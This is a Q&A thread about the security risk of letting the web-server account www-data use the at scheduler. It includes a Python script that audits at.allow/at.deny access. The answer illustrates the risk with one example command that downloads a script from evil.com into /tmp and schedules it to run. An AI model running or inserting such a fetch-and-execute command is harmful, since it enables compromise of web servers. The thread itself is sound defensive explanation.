3

I have a CGI script that is resending an email on a failed attempt 5-10 minutes after a user accesses a page. My thought was to do this using the at command from a Python call (os.system("at now + 5 minutes <<< ' python resend.py data'")). Testing revealed:

$ sudo su www-data
$ at now
You do not have permission to use at.
$

What sort of grief am I exposing myself to if I remove user 'www-data' from the /etc/at.deny file?

Jamie
  • 1,364

1 Answer

0

By making that proposed change, you are allowing the user Apache runs as to execute jobs in the future, at a later time. I dunno if this is possible, but if you were able to subvert a web server to execute something server-side like

exec("cd /tmp && wget http://evil.com/evil.php && at laterdate /tmp/evil.php")

This would exec that downloaded PHP script at a later time.

It's basically one-time cron, and to be honest, I usually disable it in favor of Jenkins.

nandoP
  • 2,067
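To see what removing www-data from /etc/at.deny actually changes, the check below applies the access rule documented in at(1) to a list of service accounts. It is an added example, not code from the question or the answer; the function names and the account list are made up for illustration, and root is matched by name rather than by uid.

```python
from pathlib import Path


def _names(path):
    """Usernames listed in an at.allow/at.deny file, or None if the file is absent."""
    p = Path(path)
    if not p.is_file():
        return None
    return {line.strip() for line in p.read_text().splitlines() if line.strip()}


def at_permitted(user, allow_path="/etc/at.allow", deny_path="/etc/at.deny"):
    """Apply the at(1) rule and return (allowed, reason)."""
    if user == "root":  # simplification: at checks for the superuser, not the name
        return True, "superuser may always use at"
    allow = _names(allow_path)
    if allow is not None:
        # When at.allow exists, at.deny is ignored entirely.
        ok = user in allow
        return ok, f"{allow_path} exists and {'lists' if ok else 'does not list'} {user}"
    deny = _names(deny_path)
    if deny is not None:
        # Without at.allow, everyone not named in at.deny may use at.
        ok = user not in deny
        return ok, f"{deny_path} {'does not list' if ok else 'lists'} {user}"
    return False, "neither file exists, so only the superuser may use at"


def audit(users, allow_path="/etc/at.allow", deny_path="/etc/at.deny"):
    """Sorted list of the given accounts that are able to schedule at jobs."""
    return sorted(u for u in users if at_permitted(u, allow_path, deny_path)[0])


if __name__ == "__main__":
    # Constructed list of service accounts to review; adjust for the host.
    SERVICE_ACCOUNTS = ["www-data", "nobody", "daemon"]
    for account in SERVICE_ACCOUNTS:
        allowed, reason = at_permitted(account)
        print(f"{account:10s} {'ALLOWED' if allowed else 'denied '}  {reason}")
```

Run it before and after editing /etc/at.deny: any service account reported as ALLOWED can queue commands that run later under its own uid.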